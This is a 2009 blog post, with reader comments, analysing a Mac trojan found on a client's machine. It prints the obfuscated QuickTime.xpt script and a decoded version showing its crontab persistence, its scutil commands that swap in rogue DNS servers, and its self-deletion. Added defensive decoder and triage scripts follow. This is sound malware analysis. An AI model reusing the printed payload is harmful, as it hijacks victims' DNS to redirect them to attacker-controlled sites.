Thursday, 15 January 2009

Mac Malware / Trojan

Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OS X is pretty secure, I told him, but you should have AV software to stop you passing on nasties to your Windows friends and colleagues.

Eat my words I did. That afternoon, a phone call from another client. He had a problem with no Internet access on his wireless network, but others on the network were OK. First test: try a site by IP. Fine, so it's a DNS issue...

Yes... but so much more. They had a pretty basic router, so monitoring was not an option. OK, talk him through opening the terminal and pinging some sites. Takes a while, then fails to look it up. OK, let's check /etc/resolv.conf...


Oh crap... two of these were not in the TCP settings. I'll let you work out which two...

Further checking...

nick@host ~ $ host
;; connection timed out; no servers could be reached
nick@host ~ $ host
Host not found: 2(SERVFAIL)
nick@host ~ $ whois
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
% Rights restricted by copyright.
% See

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to ' -'

inetnum: -
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered

Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...

Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

Smooth... and this file looks like...

more /Library/Internet\ Plug-Ins/QuickTime.xpt

x=`cat "$0" wc -lawk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1tr qazwsxedcr 0123456789` `echo $s2 tr qazwsxedcr 0123456789`;exit;
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi tjkd PjphajcSkjsplk okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
/voj/obpf/olvxpi << EOF
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
kepox=`ljnfxab -itjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
jh -jr "$0"

It even hides itself so you can't just grep the name server addresses. Roughly translated it gives...


path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil grep PrimaryService sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
)/usr/sbin/scutil << EOF
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
exist=`crontab -lgrep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
rm -rf "$0"
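
The translation above can be reproduced without running the file, by passing its text through the same two `tr` mappings the first line uses. This is an added example, not part of the original post; the function names are made up here, and the inputs are fragments copied from the sample shown above.

```shell
#!/bin/sh
# Added example: statically decode the sample's two tr substitutions.
# Nothing from the sample is executed; its text is only passed through tr.

# Mapping the first line applies to the script body (copied from the sample).
BODY_FROM='vdehrujzpbqafwtgkxyilcnos'
BODY_TO='upxmfqrzibdanwgkethlcyosv'
# Mapping applied to the two encoded name-server strings s1 and s2.
ADDR_FROM='qazwsxedcr'
ADDR_TO='0123456789'

# Decode one line of the obfuscated body (upper case and symbols pass through).
decode_body() { printf '%s\n' "$1" | tr "$BODY_FROM" "$BODY_TO"; }

# Decode one encoded name-server string into a dotted-quad address.
decode_addr() { printf '%s\n' "$1" | tr "$ADDR_FROM" "$ADDR_TO"; }

# Pull the s1=... and s2=... assignments out of the first line and decode them.
decode_stage1_addrs() {
    printf '%s\n' "$1" | tr ';' '\n' | sed -n 's/^s[12]=//p' |
    while IFS= read -r enc; do decode_addr "$enc"; done
}

# Fragments copied from the sample above, embedded so this runs offline.
STAGE1='s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;'
decode_stage1_addrs "$STAGE1"
decode_body 'daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"'
decode_body 'ljnfxab ljnf.pfox'
```

The decoded addresses are the name servers the script pushes into the DNS configuration, which is why grepping the file for them finds nothing.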

Simple, but I guess there were nasties just waiting to be got from some websites this machine was redirected to. Very Mac specific, so not a Linux trojan gone astray. I guess he fell for one of the "download this codec" type trojans and got this little parasite.

So although we don't have virii in the Mac world, little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the Safari or Firefox holes or even spoof someone's bank given the recent certificate bypass exploit.

So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!
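
The two checks that found this infection, root's crontab and the name servers in /etc/resolv.conf, can be scripted for triage on other machines. This is an added example, not part of the original post; the function names and the allow-list argument are assumptions, and the sample data is constructed using documentation address ranges.

```shell
#!/bin/sh
# Added example: triage for the persistence and DNS change described above.
# Both functions read text on stdin, so they also work on saved output,
# e.g.  sudo crontab -l | flag_cron_entries

# Print crontab entries that run every minute and whose command lives in a
# browser plug-in directory, which is the persistence pattern in this post.
flag_cron_entries() {
    grep -v '^[[:space:]]*#' |
    grep -E '^[[:space:]]*\*([[:space:]]+\*){4}[[:space:]]' |
    grep -F '/Internet Plug-Ins/'
}

# Print nameservers from resolv.conf-style input that are not in the
# space-separated allow-list passed as $1 (the servers you expect to see).
unexpected_nameservers() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "nameserver" && !($2 in ok) { print $2 }'
}

# Constructed sample data (documentation addresses, not real indicators).
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1'
SAMPLE_RESOLV='nameserver 192.0.2.53
nameserver 198.51.100.7
nameserver 203.0.113.9'

printf '%s\n' "$SAMPLE_CRON" | flag_cron_entries
printf '%s\n' "$SAMPLE_RESOLV" | unexpected_nameservers '192.0.2.53'
```

Because the crontab entry re-runs the script every minute, correcting the DNS settings without removing the entry and the file will not hold.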


John Muccigrosso said...

"Viri" if you must Latinize. (It means slime or poison.)

neural said...

i believe in this case, they would have seen these dns entries in their network preference pane, greyed out, under advanced/dns.

drbroom said...


Great post... just one note it's not "resolve.conf" it is "resolv.conf" and you should tell people that they can find the file in their "etc" directory.

I know that may be nitpicking but I think since you gave all the cool info you did you should let people know where they can look to make sure they are not affected. (I really didn't mean to nitpick I think some may do what I did and just copy the file name to look up what was in it...)

Anyway, I do have one question... Did you figure out what your client downloaded (and installed)? Curious minds would like to know? :-)

thanks again for the great info.

Nick Brooker said...

drbroom: Thanks for the feedback. I was buzzing a bit when I wrote it and missed the resolve typo.

The date modified on the file was March 2008 and he couldn't recall anything from that time, but hopefully someone else can find the trojan and tie it to something.

Nick Brooker said...

Sorry just realised the first cut and paste had chopped some out. The script is correct now...

Andrew Main said...

"'Viri' if you must Latinize. (It means slime or poison.)"

Good try, but still incorrect: "viri" is the plural of "vir" (man). There is in fact no attested plural of "virus" (slime or poison) in surviving Latin texts, but the best guess of scholars is that if it had one (it very possibly did not) it would be "viruses", which happens also to be the plural if treated as an English word.

